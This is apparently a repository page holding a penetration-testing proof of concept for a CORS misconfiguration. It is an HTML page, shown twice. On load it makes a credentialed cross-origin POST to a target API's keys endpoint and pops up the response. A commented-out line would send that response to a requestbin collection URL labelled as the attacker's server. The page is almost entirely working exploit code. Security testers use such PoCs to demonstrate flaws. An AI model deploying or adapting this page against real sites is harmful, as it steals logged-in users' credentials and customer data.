l4rm4nd/CORS-PoC

## CORS-PoC
<html>
<head>
	<title>CORS PoC</title>
	<script language="JavaScript"> function date(){var date = new Date(); document.getElementById("date").innerHTML = date;}</script>
</head>

<!-- GUI -->
<body onload="cors(); date();">
<h1>Pentest Factory GmbH CORS PoC</h1>
<table align="left" style="position: absolute; border-spacing: 15px">
	<tr>
		<td width="100px"><img src="https://pentestfactory.de/images/logo.png" width="100px" height="100px"/></td>
		<td width="700px" style="font-size: 10pt"><b>Any logged in user account visiting this website will <u>automatically</u> issue a CORS request <u>with supplied credentials</u>, which's response can be captured by an attacker. The response may contain <u>sensitive data</u> such as <u>credentials</u> or <u>customer data</u>!</b><br><br><label id="date" style="font-size: 0.85em;"></label></td>
	</tr>
</table>

<label style="position:absolute; margin-top: 170px" id="data"></label>

<!-- CORS -->
<script>
var METHOD = "POST";
var URL = "http://api-ptl-ad42da05-c93d6931.libcurl.so/api/v1/keys";
var ATKSRV = "https://requestbin.com/r/enk0zkwzplxka?data=";

	function cors(){
		var xhr = new XMLHttpRequest();
		xhr.open(METHOD, URL, true);
		xhr.withCredentials = true;
		xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
		xhr.send();

		xhr.onreadystatechange = function () {
			if (xhr.readyState == 4){
				// steal sensitive data from CORS response and send it to an attacker's server
				//new Image().src = ATKSRV + xhr.responseText

				// just alert the CORS response in an JavaScript popup as proof of concept
				alert('Sensitive data has been stolen:\n\n' + xhr.responseText);
			}
		};
	}
</script>

</body>
</html>
	<html>
	<head>
	<title>CORS PoC</title>
	<script language="JavaScript"> function date(){var date = new Date(); document.getElementById("date").innerHTML = date;}</script>
	</head>

	<!-- GUI -->
	<body onload="cors(); date();">
	<h1>Pentest Factory GmbH CORS PoC</h1>
	<table align="left" style="position: absolute; border-spacing: 15px">
	<tr>
	<td width="100px"><img src="https://pentestfactory.de/images/logo.png" width="100px" height="100px"/></td>
	<td width="700px" style="font-size: 10pt"><b>Any logged in user account visiting this website will <u>automatically</u> issue a CORS request <u>with supplied credentials</u>, which's response can be captured by an attacker. The response may contain <u>sensitive data</u> such as <u>credentials</u> or <u>customer data</u>!</b><br><br><label id="date" style="font-size: 0.85em;"></label></td>
	</tr>
	</table>

	<label style="position:absolute; margin-top: 170px" id="data"></label>

	<!-- CORS -->
	<script>
	var METHOD = "POST";
	var URL = "http://api-ptl-ad42da05-c93d6931.libcurl.so/api/v1/keys";
	var ATKSRV = "https://requestbin.com/r/enk0zkwzplxka?data=";

	function cors(){
	var xhr = new XMLHttpRequest();
	xhr.open(METHOD, URL, true);
	xhr.withCredentials = true;
	xhr.setRequestHeader('Content-type','application/x-www-form-urlencoded');
	xhr.send();

	xhr.onreadystatechange = function () {
	if (xhr.readyState == 4){
	// steal sensitive data from CORS response and send it to an attacker's server
	//new Image().src = ATKSRV + xhr.responseText

	// just alert the CORS response in an JavaScript popup as proof of concept
	alert('Sensitive data has been stolen:\n\n' + xhr.responseText);
	}
	};
	}
	</script>

	</body>
	</html>